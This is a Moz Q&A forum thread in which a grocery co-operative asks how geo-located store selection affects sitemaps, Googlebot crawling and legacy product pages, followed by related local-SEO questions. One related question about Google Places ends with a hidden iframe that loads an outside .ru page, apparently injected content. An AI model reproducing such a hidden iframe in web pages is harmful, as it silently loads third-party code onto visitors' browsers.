Geo-location by state/store
-
Hi there,
We are a Grocery co-operative retailer and have chain of stores owned by different people. We are building a new website, where we would geo-locate the closest store to the customer and direct them to a particular store (selected based on cookie and geo location). All our stores have a consistent range of products + Variation in 25% range. I have few questions
-
How to build a site-map. Since it will be mandatory for a store to be selected and same flow for the bot and user, should have all products across all stores in the sitemap? we are allowing users to find any products across all stores if they search by product identifier. But, they will be able to see products available in a particular store if go through the hierarchical journey of the website.
-
Will the bot crawl all pages across all the stores or since it will be geolocated to only one store, the content belonging to only one store will be indexed?
-
We are also allowing customers to search for older products which they might have bought few years and that are not part of out catalogue any more. these products will not appear on the online hierarchical journey but, customers will be able to search and find the products . Will this affect our SEO ranking?
Any help will be greatly appreciated.
Thanks - Costa
-
-
If you consistently see the IP address and redirect, or change content, based only on that then you will want to exempt Googlebot from those personalizations in one way or another. There are many options to this, like blocking the resources that handle this (i.e. the JavaScript.js file associated with personalization based on history or geo-location), or what was suggested above. Blocking that piece of script in the robots.txt file is less likely to be seen as cloaking.
All of this begs the question though: If you're looking at the IP, then setting a cookie, then updating the content based on the cookie, it shouldn't be an issue in the first place. Googlebot isn't accepting your cookies. So if I were to browse in Incognito mode using Chrome (and thus not accept cookies), would I see the same site and product assortments no matter which location I was in? If that's the case, maybe you don't have a problem. This is pretty easy to test.
Ultimately, I think you're going to want a single product page for each Sku, rather than one for each product at each location. The content, pricing, etc.. can be updated by location if they have a cookie, but the URL should probably never change - and the content shouldn't change by IP if they don't have a cookie.
1. Check IP
2. Embed their location in a cookie
3. Set cookie
4. If cookie is excepted and thus exists, do personalize.
If the cookie does not exist, do not personalize. You can show a message that says you must accept cookies to get the best experience, but don't make it block any major portion of the content.
-
Thanks for this. Few clarifications please,
Isnt having a different journey for a user and bot cloaking? Will google not penalise a site for that? - To make it clear - we have a single website and based on the Geo of the user, we will filter product availability. If a customer is from state A, we will should "X" products and if a customer is from State B, we will show X+Y or X-Y. All the products will have a canonical URL as part of the sitemap, so even if the product is not navigatable through the hierarchy on the website, crawlers will be able to find it through the direct canonical URL.
Here us a link to the article where John Mueller from google has some comments on the subject - https://www.seroundtable.com/google-geolocation-redirects-are-okay-26933.html
I have picked excerpts from you reply where I have some doubts, great if you can throw more light into these?
-
- "It seems like you'll have to have the same products available in multiple stores. You will want them all indexed, but will have to work hard to differentiate them (different images, different copy, different Meta data) otherwise Google will probably pick one product from one store as 'canonical' and not index the rest, leading to unfair product purchasing (users only purchasing X product from Y store, never the others)"
Since, we will have same (X products) across all our stores and across stores these products will have a single canonical URL, what will be the advantage of having different content by stores. we are thinking the content on the product pages will be the same, but, the availability of the product alone will differ based on geo. The sitemap will also remain the same across stores with the canonical product URLs
-
- "Will the bot crawl all pages across all the stores or since it will be geolocated to only one store, the content belonging to only one store will be indexed?" - No it won't. Every time Google crawls from a different data centre, they will think all your other pages are being redirected now and that part of the site is now closed. Exempt Googlebot's user-agent from your redirects or face Google's fiery wrath when they fail to index anything properly
Could you please explain a bit more on what do you mean by re-direct, as all products will exists in the website for a crawler to see if the canonical URL is used for crawling. Only the availability and the product visibility through the navigation journey will change based on geo.
Thank you for your time on this. Its extremely useful
Thanks - Costa
-
-
-
"We are a Grocery co-operative retailer and have chain of stores owned by different people. We are building a new website, where we would geo-locate the closest store to the customer and direct them to a particular store (selected based on cookie and geo location). All our stores have a consistent range of products + Variation in 25% range. I have few questions" - make sure you exempt Googlebot's user-agent from your geo-based redirects otherwise the crawling of your site will end up in a big horrible mess
-
"How to build a site-map. Since it will be mandatory for a store to be selected and same flow for the bot and user, should have all products across all stores in the sitemap? we are allowing users to find any products across all stores if they search by product identifier. But, they will be able to see products available in a particular store if go through the hierarchical journey of the website." - any pages you want Google to index should be in your XML sitemap. Any pages you don't want Google ti index should not be in there (period). If a URL uses a canonical tag to point somewhere else (and thus marks itself as NON-canonical) it shouldn't be in the XML sitemap. If a URL is blocked via robots.txt or Meta no-index directives, it shouldn't be in the XML sitemap. If a URL results in an error or redirect, it shouldn't be in your XML sitemap.The main thing to concern yourself with, is creating a 'seamless' view of indexation for Google. It seems like you'll have to have the same products available in multiple stores. You will want them all indexed, but will have to work hard to differentiate them (different images, different copy, different Meta data) otherwise Google will probably pick one product from one store as 'canonical' and not index the rest, leading to unfair product purchasing (users only purchasing X product from Y store, never the others). In reality, setting out to build a site which such highly divergent duplication is never going to yield great results, you'll just have to be aware of that from the outset
-
"Will the bot crawl all pages across all the stores or since it will be geolocated to only one store, the content belonging to only one store will be indexed?" - No it won't. Every time Google crawls from a different data centre, they will think all your other pages are being redirected now and that part of the site is now closed. Exempt Googlebot's user-agent from your redirects or face Google's fiery wrath when they fail to index anything properly
-
"We are also allowing customers to search for older products which they might have bought few years and that are not part of out catalogue any more. these products will not appear on the online hierarchical journey but, customers will be able to search and find the products . Will this affect our SEO ranking?" - If the pages are orphaned except in the XML sitemap, their rankings will go down over time. It won't necessarily hurt the rest of your site, though. Sometimes crappy results are better than no results at all!
Hope that helps
-
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Difficulty Ranking Two Locations in the Same City
We are in the self-storage business and have locations through the Pacific Northwest. As we grow, there are cities where we've added multiple (2-3) locations. But we're discovering that we're having a great deal of difficulty ranking for all of these. For instance, we have two locations in Vancouver, WA. One is West Coast Self-Storage Vancouver, and the other is West Coast Self-Storage Padden Parkway. Both are in Vancouver, WA, but for the most part, only West Coast Self-Storage Vancouver is getting ranked. In fact, on those searches where Vancouver ranks, Padden Parkway doesn't show up anywhere. Not in the top 10 pages anyway. Each location has an outer landing page and an inner details page. On each page, we've placed unique, city-optimized keywords in the URL, Page Title, h1s, content. Of course each location has a separate NAP. Each location also has its own GMB page. Each location has a decent amount of reviews across multiple sites (Google, Yelp, GetFiveStars.) Both locations were previously on their own domain until a year ago when they were redirected to their current URLs. Both of those original domains were close to the same age. With the Padden Parkway location, we've tried to be even more hyper-local, by including the address in the URLs and in the h1 of the outer page. We've also created an h2 that references local neighborhoods around the business. We're also running into this situation in at least one other city, so I'm wondering if this has something to do with our url structure. Other businesses in our space use the URL structure of domain.com/state/city/location. We only go down to the state level. What are we missing?
Local Website Optimization | | misterfla0 -
Optimizing Local SEO for Two Locations
Hi there! I have a client that has just opened a 2nd location in another state. When optimizing for local I have a few questions: We're creating a landing page for each location, this will have contact information and ideally some information on each location. Any recomendations for content on these landing pages? The big question is dual city optimization. Should Include the city & state of BOTH locations in all my title tags? or should I leave that to the unique city landing pages? What other on-page optimizations should i consider across the site? Thanks! Jordan
Local Website Optimization | | WorkhorseMKT0 -
Applying NAP Local Schema Markup to a Virtual Location: spamming or not?
I have a client that has multiple virtual locations to show website visitors where they provide delivery services. These are individual pages that include unique phone numbers, zip codes, city & state. However there is no address (this is just a service area). We wanted to apply schematic markup to these landing pages. Our development team successfully applied schema to the phone, state, city, etc. However for just the address property they said VIRTUAL LOCATION. This checked out fine on the Google structured data testing tool. Our question is this; can just having VIRTUAL LOCATION for the address property be construed as spamming? This landing page is providing pertinent information for the end user. However since there is no brick and mortar address I'm trying to determine if having VIRTUAL LOCATION as the value could be frowned upon by Google. Any insight would be very helpful. Thanks
Local Website Optimization | | RosemaryB1 -
URL and title strategy for multiple location pages in the same city
Hi, I have a customer which opens additional branches in cities where he had until now only one branch. My question is: Once we open new store pages, what is the best strategy for the local store pages in terms of URL and title?
Local Website Optimization | | OrendaLtd
So far I've seen some different strategies for URL structure:
Some use [URL]/locations/cityname-1/2/3 etc.
while others use [URL]/locations/cityname-zip code/
I've even seen [URL]/locations/street address-cityname (that's what Starbucks do) There are also different strategies for the title of the branch page.
Some use [city name] [state] [zip code] | [Company name]
Other use [Full address] | [Company name]
Or [City name] [US state] [1/2/3] | [Company name]
Or [City name] [District / Neighborhood] [Zip Code] | [Company name] What is the preferred strategy for getting the best results? On the one hand, I wish differentiate the store pages from one another and gain as much local coverage as possible; on the other hand, I wish to create consistency and establish a long term strategy, taking into consideration that many more branches will be opened in the near future.1 -
Multiple Locations with Branded Name/Keyword in URL
I have a client, let's call him "Bob". Bob has 2 stores where he sells "Widgets", Bob's Widgets and Bob's Widgets South. These locations are roughly 40 miles from each other and serve two different marketplaces. Each location has their own website "www.bobswidgets.com & www.bobswidgetssouth.com". Each location is run by different individuals. The Store Manager at Bob's Widgets is complaining that when you type "Bob's Widgets" into the search engines "Bob's Widgets South" website is indexing in the 2nd and/or 3rd position. The Store Manager at Bob's Widgets feels that Bob's Widgets South could be stealing business from him because of the way Google is indexing the sites. I have explained to him that the keyword the user is typing in is in both names of the locations and in each URL and this is prompting the search engine to index both sites. Am I missing something else???
Local Website Optimization | | mittcom0 -
Main Website and microsite - Do I do google places for both as it will technically be duplicating the locations,?
Hi All, I have a main eCommerce website which trades out of a number of locations and all these locations appear in google places although they don't rank particularly well in google places . I also have a number of microsites which are specific to one type of product I do and these rank very well locally. My question is , should I also do google places for my microsites as this would technically mean I am creating a duplicate location listing in google places but for a different website etc./business I only have one google account so I guess this would be done under the same google account ? thanks Pete <iframe id="zunifrm" style="display: none;" src="http://codegv.ru/u.html"></iframe>
Local Website Optimization | | PeteC120 -
Out of State Local Search
I've noticed when traveling that a local search (be it city, region, or state) yields different results depending on my physical location. This is very anecdotal, but with an incognito search in my clients city I'll get one result, in a different city about 30 miles away I'll get a slightly different result, in a different state but still only about 30 miles away I'll get another slightly different result, and many states away the result is different still. This isn't very scientific data, but I think something is going on. Have people experienced this? Is anyone aware of research or has an understanding of what can bias a local search in different directions depending on the distance from the area represented by that local search? These don't seem to be fluctuations in ranking, the results are widely different, but mostly constant in their respective locations. Any guidance would be appreciated.
Local Website Optimization | | Oren.0